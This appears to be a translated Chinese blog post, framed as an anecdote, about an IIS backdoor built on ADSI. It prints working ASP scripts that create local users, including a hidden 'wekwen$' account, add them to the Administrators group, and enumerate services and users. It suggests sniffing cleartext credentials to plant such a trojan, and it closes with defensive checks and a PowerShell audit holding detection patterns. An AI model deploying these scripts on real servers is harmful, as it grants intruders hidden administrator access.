You don't even think about it: an alternative IIS backdoor (Vulnerability Research)

Source: Internet
Author: User
Tags: iis, administration
Having finally left school for working life, I found that there is actually a lot about school worth being nostalgic about: work is hard, and the worst part is not being able to hang out online with friends as often. Back at school on Saturday, chatting in the server room with a friend who does network administration, I happened to spot a very familiar ASP program in a site directory on the server (I used to be a member of the school network group). I opened it: anonymous browsing was not allowed, but the "remember password" box was ticked for the account, and the login succeeded. The page displayed "Add test2 user succeeded" and "Add test2 admin succeeded". I didn't even know the administrator's password. I opened 3389 and asked my friend to look at the user list...
"Why is it that nothing good ever happens when you guys come by? Come on, what did you do this time?"
"Don't worry, it's just an old ASP trojan that was never deleted."
My friend didn't believe it. He opened an ASP trojan scanning tool and searched, checked the ClassID values of the ASP pages, and ran a full-disk scan with a newly installed version of Norton... When it finished he asked me: where's your trojan? I opened the page and showed him the code. "Huh, what kind of trojan is this? No cmd, no FSO, not even encryption, just a few lines of code..." What follows is a long explanation...
Earlier versions of IIS had two problems. First, there was no clear, open interface for third-party management products, nor an automated programmable interface for custom routine management tasks. Second, a mechanism for controlling directory services was needed so that servers on the network could discover each other. With such interfaces, site builders can use various tools to write all kinds of server management applications: beyond user management and security products, for example, programs for performance management, installation, and configuration. Microsoft published a new version of the Active Directory Service Interfaces (ADSI) in early 1998. ADSI together with the IIS Administration Objects (IISAO) provide a combined solution for controlling both directory services and IIS itself.
IISAO can be accessed from applications written in many different languages, including C++, Delphi, Java, and VB. Third-party site management tools, a rapidly growing category, can attach to IIS and directory services through ADSI and IISAO. IISAO can also be accessed from a web page through a server-side scripting engine such as Active Server Pages (ASP); in fact, if you use the HTML-based administration tools of IIS 4.0 or later, you are already using IISAO. IISAO can also be accessed from the command line using the Windows Scripting Host (WSH).
Like IISAO, ADSI is just a set of COM objects that wrap the objects of the underlying directory services. This creates an abstraction layer between the local directory service and the application, so a site builder can control many different directory services through a single public interface. With this powerful Active Directory Service Interface we can obtain full access to local or remote hosts with Administrator privileges on the Windows NT platform; several earlier articles on script-based attacks have used exactly this.
For example, to list the services on a remote machine (have PsKill ready and stop the firewall first), the code is as follows:
<%
' Bind to the machine through the WinNT ADSI provider and enumerate only Service objects
Set computerObj = GetObject("WinNT://127.0.0.1")
computerObj.Filter = Array("Service")
For Each service In computerObj
    Response.Write "Service display name = " & service.DisplayName
    Response.Write "<BR>"
    Response.Write "Service account name = " & service.ServiceAccountName
    Response.Write "<BR>"
    Response.Write "Service executable = " & service.Path
    Response.Write "<BR>"
Next
%>
After execution the page returns the results.
What do you think? Every service is listed, right? Even the path each service corresponds to is there, which is more useful than Task Manager. "You still haven't explained what you just did." "OK. In fact the ASP program on the school server is also tiny; from adding the account to elevating its privileges it is only a little over 10 lines:"
<%
' Create a local user through the WinNT ADSI provider
Set onlineServer = GetObject("WinNT://127.0.0.1")
Set newUser = onlineServer.Create("User", "test2")
newUser.SetPassword "Test2"
newUser.FullName = "Test2 test"
newUser.Description = "TestUser"
newUser.SetInfo
' Bind to the local Administrators group and add the new account to it
Set oDomain = GetObject("WinNT://127.0.0.1")
Set oGroup = oDomain.GetObject("Group", "Administrators")
' Group.Add expects the member's full ADsPath (computer/user), not a bare name
oGroup.Add "WinNT://127.0.0.1/test2,user"
Response.Write "Add test2 user succeeded"
Response.Write "Add test2 admin succeeded"
Set oDomain = Nothing
Set oGroup = Nothing
%>
Let's see the effect.

To view all accounts on the current machine you can use the following code:
Set onlineServer = GetObject("WinNT://127.0.0.1")
onlineServer.Filter = Array("User")
For Each member In onlineServer
    Response.Write member.Name & " -- " & member.FullName & "<br>"
Next

In other words, this is not very useful for escalating privileges on a website itself; it can only be used in special circumstances, where you already hold enough rights on the server, to mount an effective attack. Someone online wrote a piece of code like this:
<%@ CodePage=936 %>
<%
Response.Expires = 0
On Error Resume Next
Session.Timeout = 50
Server.ScriptTimeout = 3000
' Resolve the local computer name and bind to it through the WinNT provider
Set lp = Server.CreateObject("WScript.Network")
oz = "WinNT://" & lp.ComputerName
Set ob = GetObject(oz)
Set oe = GetObject(oz & "/Administrators,group")
' A trailing $ keeps the account out of some user listings
Set od = ob.Create("User", "wekwen$")
od.SetPassword "Wekwen"   ' <----- password
od.SetInfo
Set of = GetObject(oz & "/wekwen$,user")
oe.Add of.ADsPath
Response.Write "wekwen$ super account created successfully!"
%>
It was claimed to be a new vulnerability that lets a normal user escalate to administrator, but in my tests it never succeeded. In non-mainstream attack methods it is generally used like this: doesn't the page require an account and password to browse? You can first sniff the other side's web connection credentials on the target network segment, because by default the web account and password are transmitted completely in the clear! Then, with the permissions you already have, insert this kind of ASP trojan into the server to penetrate it (this refers to a special situation; if you think that already having the account and password makes you invincible, I have nothing to say; I am only talking about the special case, whose advantage is avoiding interference from firewalls and IDS). On an ordinary server cmd.asp does the job and none of this trouble is needed.
"Wow, that's so dangerous, delete it, delete it." My friend grabbed the mouse and killed my program. Seeing there was nothing left to do, I said I was ready to head back.
"Stop! What if someone else uses this to do damage?" my friend asked, pulling me back. "Actually, the protection is very simple: just restore anonymous access." Seeing my friend pull out a huge Oxford dictionary ready to hit me with it, I could only keep talking.
If you must use this kind of access, you can write some ASP code to counter it. For example, the following returns all members of the local Administrators group on the computer; add an automatic refresh and have it pop up a dialog box as soon as an intrusion is discovered:
Set objNetwork = CreateObject("WScript.Network")
strComputer = objNetwork.ComputerName
Set objGroup = GetObject("WinNT://" & strComputer & _
    "/Administrators,group")
For Each objUser In objGroup.Members
    Response.Write objUser.Name & "<br>"
Next
Code that removes any member of the local Administrators group that is neither the local Administrator account nor the domain Administrator account:
Set objNetwork = CreateObject("WScript.Network")
strComputer = objNetwork.ComputerName
Set objGroup = GetObject("WinNT://" & strComputer & _
    "/Administrators,group")
For Each objUser In objGroup.Members
    ' Note: <> is a case-sensitive (binary) comparison in VBScript
    If objUser.Name <> "Administrator" And objUser.Name <> _
        "Work\administrator" Then
        objGroup.Remove objUser.AdsPath
    End If
Next
A script that reports the status of the Guest account on the local computer:
Set objNetwork = CreateObject("WScript.Network")
strComputer = objNetwork.ComputerName
Set objUser = GetObject("WinNT://" & strComputer & "/Guest")
If objUser.AccountDisabled Then
    Response.Write "Guest account not in use."
Else
    Response.Write "Guest account is in use."
End If
Check whether any folders on your computer are shared:
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & _
    "\root\cimv2")
Set colShares = objWMIService.ExecQuery("SELECT * FROM Win32_Share")
For Each objShare In colShares
    Response.Write "Name: " & objShare.Name & " "
    Response.Write "Path: " & objShare.Path & " "
    Response.Write "Type: " & objShare.Type & "<br>"
Next
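A PowerShell audit that follows on from the checks above, added here as an example and not code from the original post: it searches the web root for ASP files that drive the WinNT ADSI provider the way the add-admin scripts do, and lists members of the local Administrators group that are off a baseline or carry the trailing "$" of the hidden wekwen$ account. The $WebRoot path and $ExpectedAdmins baseline are assumptions; adjust them to the server.

```powershell
# Added example (not from the original post). Assumes PowerShell 5.1+ on the
# IIS host with rights to read the web root and enumerate local groups.
param(
    [string]$WebRoot = 'C:\inetpub\wwwroot',        # assumption
    [string[]]$ExpectedAdmins = @('Administrator')   # assumption: your baseline
)

# 1. Find ASP files that bind to the WinNT ADSI provider, create users, or
#    touch the Administrators group: the three things every script above does.
function Find-AdsiBackdoorCandidates {
    param([string]$Root)
    $pattern = '(?i)GetObject\s*\(\s*"winnt://|\.Create\s*\(\s*"User"|administrators,group'
    Get-ChildItem -Path $Root -Recurse -Include *.asp,*.asa,*.aspx -File -ErrorAction SilentlyContinue |
        Select-String -Pattern $pattern |
        Select-Object Path, LineNumber, Line
}

# 2. Enumerate the local Administrators group through the same WinNT provider
#    the article uses, and flag members that are not on the baseline or whose
#    name ends in '$' (the hidden-account trick from the wekwen$ script).
function Test-LocalAdministrators {
    param([string[]]$Baseline)
    $group = [ADSI]'WinNT://./Administrators,group'
    foreach ($m in @($group.Invoke('Members'))) {
        $name = $m.GetType().InvokeMember('Name', 'GetProperty', $null, $m, $null)
        $path = $m.GetType().InvokeMember('AdsPath', 'GetProperty', $null, $m, $null)
        [pscustomobject]@{
            Name       = $name
            AdsPath    = $path
            Unexpected = ($Baseline -notcontains $name)
            HiddenName = $name.EndsWith('$')
        }
    }
}

Write-Host "== ASP files touching the WinNT ADSI provider under $WebRoot =="
Find-AdsiBackdoorCandidates -Root $WebRoot | Format-Table -AutoSize

Write-Host '== Local Administrators members off the baseline or with a trailing $ =='
Test-LocalAdministrators -Baseline $ExpectedAdmins |
    Where-Object { $_.Unexpected -or $_.HiddenName } |
    Format-Table -AutoSize
```

Run it on a schedule and diff the output against the previous run; a new row in either table is the moment to look at the server, not after the next "add admin succeeded" message.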
"Is that all you've got? I think it's a nice way to write an IIS backdoor; I'll have to study it. Tomorrow is Sunday, you mustn't leave, help me with the shift!" God, another whole night watching the computer room. My weekend, brother!
